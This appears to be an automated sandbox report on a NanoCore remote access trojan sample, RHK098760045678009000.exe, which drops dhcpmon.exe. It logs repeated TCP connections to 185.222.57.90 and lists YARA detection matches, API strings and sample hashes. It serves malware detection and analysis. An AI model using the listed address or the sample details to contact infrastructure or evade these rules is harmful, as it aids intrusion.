        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
        Source: RHK098760045678009000.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: RHK098760045678009000.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: RHK098760045678009000.exe, 0000000B.00000002.306617686.0000000002A3E000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 0_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FC2

        E-Banking Fraud:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 14.2.dhcpmon.exe.24f0000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.RHK098760045678009000.exe.f051458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.1.RHK098760045678009000.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.RHK098760045678009000.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.dhcpmon.exe.24a0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.dhcpmon.exe.f061458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.RHK098760045678009000.exe.3a33258.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.dhcpmon.exe.38d3258.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.RHK098760045678009000.exe.f040000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.RHK098760045678009000.exe.415058.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.1.RHK098760045678009000.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.dhcpmon.exe.24a0000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.RHK098760045678009000.exe.f041458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.dhcpmon.exe.f061458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.dhcpmon.exe.3823258.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.dhcpmon.exe.38a16b4.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.dhcpmon.exe.f061458.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.dhcpmon.exe.4c4428.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.RHK098760045678009000.exe.2490000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.dhcpmon.exe.f050000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.dhcpmon.exe.f061458.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.dhcpmon.exe.722890.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.dhcpmon.exe.38d3258.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.dhcpmon.exe.39516b4.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.dhcpmon.exe.f050000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.1.RHK098760045678009000.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000017.00000001.311282865.0000000000414000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.314320078.00000000038D1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000001.298075260.0000000000414000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.300740057.000000000F050000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.314003400.000000000F050000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.313620230.0000000000715000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.313348558.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.292543029.000000000F030000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.304923421.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.314060593.00000000024F2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.265580508.000000000F040000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000001.289620419.0000000000414000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.313999047.00000000024A0000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.327700810.0000000004960000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.327748596.00000000049A2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.327015327.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.306384984.00000000025F2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.306683045.0000000003A31000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.327148918.00000000004B5000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.305718280.0000000000615000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.327594984.0000000003821000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.306281947.0000000002490000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RHK098760045678009000.exe PID: 1744, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RHK098760045678009000.exe PID: 5820, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RHK098760045678009000.exe PID: 2184, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 2724, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6216, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6692, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6812, type: MEMORYSTR

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 14.2.dhcpmon.exe.24f0000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.dhcpmon.exe.24f0000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.RHK098760045678009000.exe.f051458.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.RHK098760045678009000.exe.f051458.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.dhcpmon.exe.28f687c.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.1.RHK098760045678009000.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.1.RHK098760045678009000.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 11.2.RHK098760045678009000.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.2.RHK098760045678009000.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.dhcpmon.exe.24a0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.dhcpmon.exe.24a0000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 21.2.dhcpmon.exe.f061458.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 21.2.dhcpmon.exe.f061458.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 11.2.RHK098760045678009000.exe.3a33258.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.2.RHK098760045678009000.exe.3a33258.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.dhcpmon.exe.38d3258.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.dhcpmon.exe.38d3258.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0.2.RHK098760045678009000.exe.f040000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0.2.RHK098760045678009000.exe.f040000.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 11.2.RHK098760045678009000.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.2.RHK098760045678009000.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 23.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 23.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 11.2.RHK098760045678009000.exe.2a56864.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.1.RHK098760045678009000.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.1.RHK098760045678009000.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 23.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 23.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.dhcpmon.exe.24a0000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.dhcpmon.exe.24a0000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 8.2.RHK098760045678009000.exe.f041458.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 8.2.RHK098760045678009000.exe.f041458.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.dhcpmon.exe.f061458.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.dhcpmon.exe.f061458.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 23.2.dhcpmon.exe.3823258.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 23.2.dhcpmon.exe.3823258.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 23.2.dhcpmon.exe.38a16b4.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 21.2.dhcpmon.exe.f061458.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 21.2.dhcpmon.exe.f061458.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 23.2.dhcpmon.exe.4c4428.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 23.2.dhcpmon.exe.4c4428.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 11.2.RHK098760045678009000.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.2.RHK098760045678009000.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.dhcpmon.exe.f050000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.dhcpmon.exe.f050000.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.dhcpmon.exe.f061458.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.dhcpmon.exe.f061458.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.dhcpmon.exe.722890.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.dhcpmon.exe.722890.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.dhcpmon.exe.38d3258.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.dhcpmon.exe.38d3258.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.dhcpmon.exe.39516b4.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 21.2.dhcpmon.exe.f050000.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 21.2.dhcpmon.exe.f050000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 11.1.RHK098760045678009000.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.1.RHK098760045678009000.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000017.00000001.311282865.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000017.00000001.311282865.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.314320078.00000000038D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000E.00000002.314320078.00000000038D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000001.298075260.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000E.00000001.298075260.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000017.00000002.327568976.000000000282E000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000002.300740057.000000000F050000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000002.300740057.000000000F050000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000015.00000002.314003400.000000000F050000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000015.00000002.314003400.000000000F050000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.313620230.0000000000715000.00000004.00000020.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000E.00000002.313620230.0000000000715000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000B.00000002.306617686.0000000002A3E000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.313348558.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000E.00000002.313348558.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000008.00000002.292543029.000000000F030000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000008.00000002.292543029.000000000F030000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000B.00000002.304923421.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000B.00000002.304923421.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.314060593.00000000024F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000E.00000002.314060593.00000000024F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000002.265580508.000000000F040000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000002.265580508.000000000F040000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000B.00000001.289620419.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000B.00000001.289620419.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.313999047.00000000024A0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000E.00000002.313999047.00000000024A0000.00000004.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000017.00000002.327700810.0000000004960000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000017.00000002.327700810.0000000004960000.00000004.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000017.00000002.327748596.00000000049A2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000017.00000002.327748596.00000000049A2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000017.00000002.327015327.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000017.00000002.327015327.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000B.00000002.306384984.00000000025F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000B.00000002.306384984.00000000025F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000B.00000002.306683045.0000000003A31000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000B.00000002.306683045.0000000003A31000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000017.00000002.327148918.00000000004B5000.00000004.00000020.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000017.00000002.327148918.00000000004B5000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.314285351.00000000028DE000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000B.00000002.305718280.0000000000615000.00000004.00000020.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000B.00000002.305718280.0000000000615000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000017.00000002.327594984.0000000003821000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000017.00000002.327594984.0000000003821000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000B.00000002.306281947.0000000002490000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000B.00000002.306281947.0000000002490000.00000004.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: RHK098760045678009000.exe PID: 1744, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: RHK098760045678009000.exe PID: 1744, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: RHK098760045678009000.exe PID: 5820, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: RHK098760045678009000.exe PID: 5820, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: RHK098760045678009000.exe PID: 2184, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: dhcpmon.exe PID: 2724, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: dhcpmon.exe PID: 2724, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: dhcpmon.exe PID: 6216, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: dhcpmon.exe PID: 6692, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: dhcpmon.exe PID: 6692, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: dhcpmon.exe PID: 6812, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: RHK098760045678009000.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: 14.2.dhcpmon.exe.24f0000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.dhcpmon.exe.24f0000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
